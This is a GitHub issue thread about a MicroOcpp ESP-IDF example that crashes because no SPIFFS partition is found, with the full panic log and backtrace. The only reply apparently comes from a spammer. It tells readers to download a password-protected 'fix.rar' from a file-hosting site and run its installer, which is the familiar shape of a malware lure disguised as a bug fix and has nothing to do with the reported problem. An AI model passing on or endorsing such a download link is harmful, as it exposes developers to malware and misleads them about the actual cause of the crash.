### ISSUE TITLE
spiffs partition could not be found

### ISSUE THREAD

**Issue by ap9389552** [matth-x/MicroOcpp#364]
I Build and flash the ESPIDF code from example and I'm getting this error

E (11138) SPIFFS: spiffs partition could not be found
[MO] ERROR (FilesystemAdapter.cpp:640): Failed to find SPIFFS partition
[MO] warning (MicroOcppMongooseClient.cpp:58): Credentials non-persistent. Use MicroOcpp::makeDefaultFilesystemAdapter(...) for persistency
2953 3 mongoose.c:3440:mg_connect       1 -1 ws://echo.websocket.events/
2958 3 mongoose.c:3440:mg_connect       2 -1 udp://8.8.8.8:53
295e 3 mongoose.c:4113:mg_send          2 0x36 0:0 -1 err 118
2963 1 mongoose.c:404:mg_error          2 0x36 DNS send
E (11178) SPIFFS: spiffs partition could not be found
[MO] ERROR (FilesystemAdapter.cpp:640): Failed to find SPIFFS partition
Guru Meditation Error: Core  0 panic'ed (LoadProhibited). Exception was unhandled.

Core  0 register dump:
PC      : 0x400e7009  PS      : 0x00060c30  A0      : 0x800da124  A1      : 0x3ffb9cd0
0x400e7009: MicroOcpp::Connector::Connector(MicroOcpp::Context&, std::shared_ptr<MicroOcpp::FilesystemAdapter>, unsigned int) at D:/smowcode/codes/MicroOcpp/examples/ESP-IDF/components/MicroOcpp/src/MicroOcpp/Model/ConnectorBase/Connector.cpp:84 (discriminator 1)

A2      : 0x3ffc75f8  A3      : 0x3ffc76d0  A4      : 0x3ffb9e30  A5      : 0x00000000
A6      : 0x00000005  A7      : 0x3ffb9da4  A8      : 0xffffffff  A9      : 0x3ffb9cc0
A10     : 0x00000005  A11     : 0x3ffb9da9  A12     : 0x000000ff  A13     : 0x0000ff00
A14     : 0x00ff0000  A15     : 0xff000000  SAR     : 0x00000018  EXCCAUSE: 0x0000001c
EXCVADDR: 0x00000000  LBEG    : 0x400014fd  LEND    : 0x4000150d  LCOUNT  : 0xfffffffe
0x400014fd: strlen in ROM
0x4000150d: strlen in ROM

Backtrace: 0x400e7006:0x3ffb9cd0 0x400da121:0x3ffb9e00 0x400d86dc:0x3ffb9ee0 0x400d8719:0x3ffb9f40 0x400d8620:0x3ffba180 0x4018aa0b:0x3ffba1f0 0x40089be9:0x3ffba220
0x400e7006: MicroOcpp::Connector::Connector(MicroOcpp::Context&, std::shared_ptr<MicroOcpp::FilesystemAdapter>, unsigned int) at D:/smowcode/codes/MicroOcpp/examples/ESP-IDF/components/MicroOcpp/src/MicroOcpp/Model/ConnectorBase/Connector.cpp:82
0x400da121: mocpp_initialize(MicroOcpp::Connection&, char const*, std::shared_ptr<MicroOcpp::FilesystemAdapter>, bool, MicroOcpp::ProtocolVersion) at D:/smowcode/codes/MicroOcpp/examples/ESP-IDF/components/MicroOcpp/src/MicroOcpp.cpp:289 (discriminator 2)
0x400d86dc: ocpp_initialize_full at D:/smowcode/codes/MicroOcpp/examples/ESP-IDF/components/MicroOcpp/src/MicroOcpp_c.cpp:29 (discriminator 2)
0x400d8719: ocpp_initialize at D:/smowcode/codes/MicroOcpp/examples/ESP-IDF/components/MicroOcpp/src/MicroOcpp_c.cpp:17 (discriminator 2)
0x400d8620: app_main at D:/smowcode/codes/MicroOcpp/examples/ESP-IDF/main/main.c:163
0x4018aa0b: main_task at D:/esp-idf/components/freertos/app_startup.c:208
0x40089be9: vPortTaskWrapper at D:/esp-idf/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:134

ELF file SHA256: f91244711

Rebooting...
ets Jul 29 2019 12:21:46

rst:0xc (SW_CPU_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0030,len:7172
load:0x40078000,len:15532
load:0x40080400,len:4
0x40080400: _init at ??:?

load:0x40080404,len:3904
entry 0x40080640

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
